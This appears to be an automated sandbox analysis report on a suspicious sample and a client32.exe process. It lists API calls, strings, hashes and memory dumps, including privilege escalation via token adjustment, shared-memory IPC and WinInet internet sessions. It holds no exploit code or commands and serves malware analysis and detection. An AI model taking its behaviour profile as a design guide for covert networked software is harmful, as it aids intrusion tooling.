Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: kL
API String ID: 3761405300-2496334608
Opcode ID: 094a4f4e8a6beddf07790b56e1b2d547280169ea491b79083bd29b3b6bf6a565
Instruction ID: cf7d9f9155c6a786c0b3161aeab5a5a23596e8236add4803911d49fd0f7648d5
Opcode Fuzzy Hash: 094a4f4e8a6beddf07790b56e1b2d547280169ea491b79083bd29b3b6bf6a565
Instruction Fuzzy Hash: 0A21DFF4D91200DAEF04EFE6F54EA503BA4BB58314F11486AE608CF390E3B094A0EF44

Function 0040D100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000065,?), ref: 0040D173
SetDlgItemTextW.USER32(?,00000066), ref: 0040D17E

Strings

RENAMEDLG, xrefs: 0040D10F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: ItemText
String ID: RENAMEDLG
API String ID: 3367045223-3299779563
Opcode ID: 8ed6787faad9cbbb868cc10b0d52fa6021cdc34f303c054ea177ed56621f72de
Instruction ID: 4ee24befb69e4a1be06190cd166144852e42fe61c15f0a09565bbf0927b3cd60
Opcode Fuzzy Hash: 8ed6787faad9cbbb868cc10b0d52fa6021cdc34f303c054ea177ed56621f72de
Instruction Fuzzy Hash: 7C01FC32A4411876DA205F919C01FBB3B59DB4AB50F100437FA04BF1C0CEB9941AA7AD

Function 0040AA19 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 0040AA73

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 0040AA31
Maximum allowed array size (%u) is exceeded, xrefs: 0040AA3F

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$lB
API String ID: 620378156-1794904129
Opcode ID: d41e2a704565317fd2c94e81f40aa926b5c88f24b45188604948ce81e6fec88e
Instruction ID: b500f34932ad8ce4e05e853272086ad43b1a6074f26b2f7342b59cfe4da1b029
Opcode Fuzzy Hash: d41e2a704565317fd2c94e81f40aa926b5c88f24b45188604948ce81e6fec88e
Instruction Fuzzy Hash: BC0171353007015FD724AA25D99192BB3D9EB88714350843FE99BD77C1EA38AC54CB59

Function 00411D93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 00411DED

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 00411DAB
Maximum allowed array size (%u) is exceeded, xrefs: 00411DB9

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$lB
API String ID: 620378156-1794904129
Opcode ID: 28825acc152db52d3fa0281383477f54fa058ab7c67e1a66e1805b51de25f82b
Instruction ID: d82eadcbee8117c8ff3590695266b88f0c89928d08ab8b2669795ace0bbb6508
Opcode Fuzzy Hash: 28825acc152db52d3fa0281383477f54fa058ab7c67e1a66e1805b51de25f82b
Instruction Fuzzy Hash: A301B1353007014F9324AB56D89196BB3D9EB84714350443FE99BC7B92EA38FC408758

Function 00411CFE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 00411D56

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 00411D16
Maximum allowed array size (%u) is exceeded, xrefs: 00411D24

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$lB
API String ID: 620378156-1794904129
Opcode ID: 9cf5ef9fa059dcd5117f9738842c8236dfe7822d8a6092f76d869565331e43d3
Instruction ID: d13bf4787bdaf7665f189edcac7a8d1bdd75279939e97790243e6d88f610abd6
Opcode Fuzzy Hash: 9cf5ef9fa059dcd5117f9738842c8236dfe7822d8a6092f76d869565331e43d3
Instruction Fuzzy Hash: CB01DF763006015F9324AB16E89196BB3DDEB80764350883FE99BD3B51EA38BC818758

Function 004011BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

_realloc.LIBCMT ref: 00401214

Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF

Strings

lB, xrefs: 004011D6
Maximum allowed array size (%u) is exceeded, xrefs: 004011E4

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __vswprintf_c_l_realloc
String ID: Maximum allowed array size (%u) is exceeded$lB
API String ID: 620378156-1794904129
Opcode ID: 8c286346231573e52bf9bdac3113c4ca5047a0ff642fad15a825e23e0f5008e7
Instruction ID: 568b596e3018965ec9595de06f1301c8bb83e75b927032956014d8f4f3e6bc85
Opcode Fuzzy Hash: 8c286346231573e52bf9bdac3113c4ca5047a0ff642fad15a825e23e0f5008e7
Instruction Fuzzy Hash: A601BC322006059FD324AA56D48092BB3EDEB84328351493FE99BE3792EA38FC408758

Function 0040C05E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0AF
LoadStringW.USER32(?,-0042E789,00000200), ref: 0040C0C1

Strings

xB, xrefs: 0040C084

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: LoadString
String ID: xB
API String ID: 2948472770-2250720281
Opcode ID: 1bc04d45c5cdfb42c06f2eed55935f251d0dc257803f803710fafc90295b38cf
Instruction ID: bcbecee609e592aace6aca3dfc06c1f6893ca9f60a3ac38b0d71b54fe5a4558a
Opcode Fuzzy Hash: 1bc04d45c5cdfb42c06f2eed55935f251d0dc257803f803710fafc90295b38cf
Instruction Fuzzy Hash: B3018632710210AFD6209B66AC84F577AEDEF96354F00453BF504D2260D7359C01C76C

Function 00409EFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00409F12
_wcspbrk.LIBCMT ref: 00409F5A

Strings

?*<>|", xrefs: 00409F54

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcschr_wcspbrk
String ID: ?*<>|"
API String ID: 3305141221-226352099
Opcode ID: 8297a28fad67a498d65ce2db0a1ea6ffe756b7e251e3d4108ae2fd75c5d1f36c
Instruction ID: bb2577b11979df31ae1d288d9972051883ae3c7c2f7aabc7a1d549f5a06b56f6
Opcode Fuzzy Hash: 8297a28fad67a498d65ce2db0a1ea6ffe756b7e251e3d4108ae2fd75c5d1f36c
Instruction Fuzzy Hash: 8FF08C2911832354DE2C6A6594016B363E8DB1AB94B64847FF8C1F22D3E73DCC82C2AC

Function 022A8EBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 022ACB81: RtlEnterCriticalSection.NTDLL(00000000), ref: 022ACB9C

FlushFileBuffers.KERNEL32(00000000,022BC838,0000000C,022A8FC1,022A230F,?,022B3318,022B3318,022A230F,?,022B3318), ref: 022A8F03
GetLastError.KERNEL32 ref: 022A8F14

Strings

D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022A8EFB

Memory Dump Source

Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd

Similarity

API ID: BuffersCriticalEnterErrorFileFlushLastSection
String ID: D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c
API String ID: 4109680722-112580537
Opcode ID: 4843e1b3cdc0c4fa1f63f16d22b125b5615ab98d817a7c1bc68654f014f50385
Instruction ID: e1aff1456bc34b729dcc77c0187081a1bce629a6615c22431ea5f3f6ef336685
Opcode Fuzzy Hash: 4843e1b3cdc0c4fa1f63f16d22b125b5615ab98d817a7c1bc68654f014f50385
Instruction Fuzzy Hash: 18018C32E603058FDB15EFE8E819A5EBBA6EF49720F10465BE411DB694EB7498018F90

Function 0041D168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004196D1: __getptd.LIBCMT ref: 004196D7
Part of subcall function 004196D1: __getptd.LIBCMT ref: 004196E7

__getptd.LIBCMT ref: 0041D177

Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81

__getptd.LIBCMT ref: 0041D185

Strings

csm, xrefs: 0041D193

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: __getptd$__amsg_exit
String ID: csm
API String ID: 1969926928-1018135373
Opcode ID: 321913763c99b3bd191a566b9e7829b8f1ac9bf2def8adda9709ea10ad968c08
Instruction ID: de875d6bece7835daa247b9eb914e2b65c94ab0c1e069700b04dae6991395b4a
Opcode Fuzzy Hash: 321913763c99b3bd191a566b9e7829b8f1ac9bf2def8adda9709ea10ad968c08
Instruction Fuzzy Hash: F4014FB4C00704ABCF349F25C4486EEB3B6AF10351F54491FE84156661DB3889D1DF59

Function 004109A9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004109BF
_wcscpy.LIBCMT ref: 004109D5

Strings

TeB, xrefs: 004109B6

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: _wcscpy_wcslen
String ID: TeB
API String ID: 2972469078-346873888
Opcode ID: 9369c93b066296c41581a1acd797f8aae873a66f8d63b70f52ea728b83c955a2
Instruction ID: 5092ac4648e0357d6d94db008c5a8fb3950d3525b2bf4806f66944b5226ffe7f
Opcode Fuzzy Hash: 9369c93b066296c41581a1acd797f8aae873a66f8d63b70f52ea728b83c955a2
Instruction Fuzzy Hash: FCE0DFB22043016B9224EA4AE8C1C97A3EDDE883A5310443FF25587242CE78AC4587A8

Function 0042047F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00420499

Strings

CorExitProcess, xrefs: 00420493
mscoree.dll, xrefs: 00420484

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc
String ID: CorExitProcess$mscoree.dll
API String ID: 190572456-1276376045
Opcode ID: b6058420a326d07f330a6f3ae2d5a3b71ea341ebe4a225979e3c26eb4b47ed3e
Instruction ID: 0af4a1246795dc1b109d18277006bc859a7a5a95eebb3f7eac335b8bdd8e1a77
Opcode Fuzzy Hash: b6058420a326d07f330a6f3ae2d5a3b71ea341ebe4a225979e3c26eb4b47ed3e
Instruction Fuzzy Hash: 68D022303843147B4E503BF3FC06E073A8CCE80BA23A980AAB40CD1141CE2EC80080BC

Function 00410AD1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410AE6

Strings

kernel32, xrefs: 00410AD1
SetDllDirectoryW, xrefs: 00410AE0

Memory Dump Source

Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd

Similarity

API ID: AddressProc
String ID: SetDllDirectoryW$kernel32
API String ID: 190572456-2052158636
Opcode ID: cd6cf6bafad6f68695a660f5135e440b64b7058a7a9b523b903e94969380d315
Instruction ID: f0f24b46a8b35c60d0046942ae1fca182e8259283ef927a52db87108ea37003c
Opcode Fuzzy Hash: cd6cf6bafad6f68695a660f5135e440b64b7058a7a9b523b903e94969380d315
Instruction Fuzzy Hash: 1FD0A7F034822010561867735C17E27115C8900F4576A912F7185D0085CE5CC484E12C

Analysis Process: client32.exePID: 6276, Parent PID: 6968COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	11.9%
Total number of Nodes:	2000
Total number of Limit Nodes:	76

Executed Functions

Function 1109E5B0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501
filethreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1109D860: GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,0BAD89F8,00080000,00000000,?), ref: 1109D88D
Part of subcall function 1109D860: OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
Part of subcall function 1109D860: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
Part of subcall function 1109D860: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9

LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,0BAD89F8,00080000,00000000,?), ref: 1109E645
InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E65E
SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E669
GetVersionExA.KERNEL32(?), ref: 1109E680
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E6EE
SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E703
FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E714
CreateFileMappingA.KERNEL32(000000FF,11030703,00000004,00000000,?,?), ref: 1109E750
GetLastError.KERNEL32 ref: 1109E75D
LocalFree.KERNEL32(?), ref: 1109E786
LocalFree.KERNEL32(?), ref: 1109E793
GetLastError.KERNEL32 ref: 1109E7B0
MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E7CE
LocalFree.KERNEL32(?), ref: 1109E7F9
LocalFree.KERNEL32(?), ref: 1109E806

Part of subcall function 1109D7D0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E69E), ref: 1109D7D8

Part of subcall function 1109D810: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D824

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E832
LocalFree.KERNEL32(?), ref: 1109E8FB
LocalFree.KERNEL32(?), ref: 1109E908
_memset.LIBCMT ref: 1109E920
GetTickCount.KERNEL32 ref: 1109E928
GetCurrentProcessId.KERNEL32 ref: 1109E9D4
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E9EF
CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109EA3B
GetLastError.KERNEL32 ref: 1109EA44
GetLastError.KERNEL32(00000000), ref: 1109EA4B
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EA80
GetLastError.KERNEL32 ref: 1109EA89
GetLastError.KERNEL32(00000000), ref: 1109EA90
CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109EAC6
GetLastError.KERNEL32 ref: 1109EACF
GetLastError.KERNEL32(00000000), ref: 1109EAD6
CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109EB0B
GetLastError.KERNEL32 ref: 1109EB1A
GetLastError.KERNEL32(00000000), ref: 1109EB1D
LocalFree.KERNEL32(?), ref: 1109EB45
LocalFree.KERNEL32(?), ref: 1109EB52
GetCurrentThreadId.KERNEL32 ref: 1109EB83
CreateThread.KERNEL32(00000000,00002000,Function_0009E140,00000000,00000000,00000030), ref: 1109EB9D
ResetEvent.KERNEL32(?), ref: 1109EBCC
ResetEvent.KERNEL32(?), ref: 1109EBD2
ResetEvent.KERNEL32(?), ref: 1109EBD8
SetEvent.KERNEL32(?), ref: 1109EBDE

Strings

map exists, xrefs: 1109E90A
S:(ML;;NW;;;LW), xrefs: 1109E6A8
cant map, xrefs: 1109E808
Cant create event %s, e=%d (x%x), xrefs: 1109EA59, 1109EA9E, 1109EAE4, 1109EB27
cant create filemap, xrefs: 1109E795
IPC(%s) created, xrefs: 1109EBE8
Error cant map view, xrefs: 1109E7DB
warning map exists, xrefs: 1109E8B0
SeSecurityPrivilege, xrefs: 1109E61A
Error filemap exists, xrefs: 1109E8DD
cant create thread, xrefs: 1109EBAA
Info - reusing existing filemap, xrefs: 1109E899
Error creating filemap (%d), xrefs: 1109E764
Error cant create events, xrefs: 1109EC07
cant create events, xrefs: 1109EC14

Memory Dump Source

Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
API String ID: 3291243470-2792520954
Opcode ID: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
Instruction ID: a3fd055aacadca8d823d44ca49761fd5d24e706f53ed4dbc48f97bf713fa71f6
Opcode Fuzzy Hash: 5f128e5d137d7e61479c73dee0859362bd36eaaf37b2cb873371865b9cdea2a1
Instruction Fuzzy Hash: A612B2B5E0026D9FEB24DF60CDD4EAAB7BAFB88304F0049A9E51D97640D671AD84CF50

Function 11029BB0 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(WinInet.dll,0BAD89F8,771B23A0,?,00000000), ref: 11029BE5
GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
SetLastError.KERNEL32(00000078), ref: 11029C93
_malloc.LIBCMT ref: 11029CB7
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
GetLastError.KERNEL32 ref: 11029CF2
_free.LIBCMT ref: 11029CFE
_malloc.LIBCMT ref: 11029D07
GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
